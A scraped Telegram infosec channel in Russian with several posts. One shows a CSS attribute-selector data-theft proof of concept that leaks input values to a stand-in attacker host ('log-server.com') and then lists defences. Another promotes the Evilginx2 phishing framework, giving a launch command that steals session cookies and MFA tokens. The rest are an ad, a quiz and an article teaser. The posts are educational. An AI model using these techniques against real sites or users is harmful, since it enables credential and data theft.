Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
1.96K photos
109 videos
166 files
2.98K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://t.iss.one/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
👮‍♀️ CSS Data Theft — как украсть данные с помощью стилей

CSS обычно используется для оформления, но может извлекать данные. Это уязвимость, но мы рассмотрим безопасный локальный PoC.

Как это работает:

1. Цель — найти нужный текст (например, email) на странице.

2. Инструмент — CSS меняет стили элементов в зависимости от содержимого ([attr^=], [attr$=], [attr*=] и другие).

3. Угроза — злоумышленник подгружает изображения в зависимости от текста и по логам определяет найденные символы.

🖥 Локальный PoC:

HTML-страница (жертва)


<!DOCTYPE html>
<html>
<head>
<title>Личный кабинет</title>
</head>
<body>
<input type="text" value="secret123" id="secret">
</body>
</html>


CSS-«атака»


input[value^="s"] {
background: url("log-server.com/starts-with-s");
}
input[value^="se"] {
background: url("log-server.com/starts-with-se");
}


В реальной атаке log-server.com — это сервер злоумышленника, но в нашем примере можно заменить его на локальный https://localhost:8000 и отслеживать запросы в консоли браузера.

Как защититься:

Не храните чувствительные данные в DOM, особенно в значении полей value.

Используйте Content-Security-Policy (CSP), чтобы ограничить загрузку ресурсов с неподтверждённых доменов и избежать подключения внешних стилей.

Изолируйте стили между доменами с помощью iframe sandbox, чтобы предотвратить манипуляции с внешними ресурсами.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
4
This media is not supported in your browser
VIEW IN TELEGRAM
📅 Сегодня в 19:00 МСК — бесплатный вебинар с Марией Жаровой.

Тема: «Введение в ML: как спрогнозировать стоимость недвижимости».

🔹 Разберём задачу прогноза стоимости недвижимости.
🔹 Покажем пошагово, как собрать первую модель.
🔹 Получите готовые скрипты для старта.

Не зайдёшь — будешь ещё год делать вид, что понимаешь графики в чужих презентациях.

👉 Регистрируйтесь
🔥3
Какой HTTP-код придумали шутки ради, а потом он стал мемом
Anonymous Quiz
26%
451
15%
499
22%
418
37%
999
💯4😁1
🛠 Фишка инструмента: Evilginx2

Evilginx2 — это фреймворк для phishing-атаки без паролей, главная фишка которого в том, что он перехватывает cookies сессии и токены MFA.

Чем полезен:

— Обход классических 2FA/SMS/MFA

— Реалистичные фишинговые страницы (копируются вживую)

— Поддержка кастомных фишинговых шаблонов

— Логи сессий с захваченными cookies и токенами

Пример запуска:

evilginx -p ./phishlets/microsoft.yaml 


После запуска жертва открывает фишинговый домен, проходит логин, а атакующий получает рабочие cookies.

🔗 GitHub проекта

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5👏1
👮‍♀️ Разбор APK мессенджера Max

Мессенджер Max активно продвигают как «новинку», но под капотом он оказался куда более знакомым.

В карточках — что внутри Max, на чём он работает и как обстоят дела с безопасностью 🔒

🔗 Полный текст статьи — по ссылке

🐸 Библиотека хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚72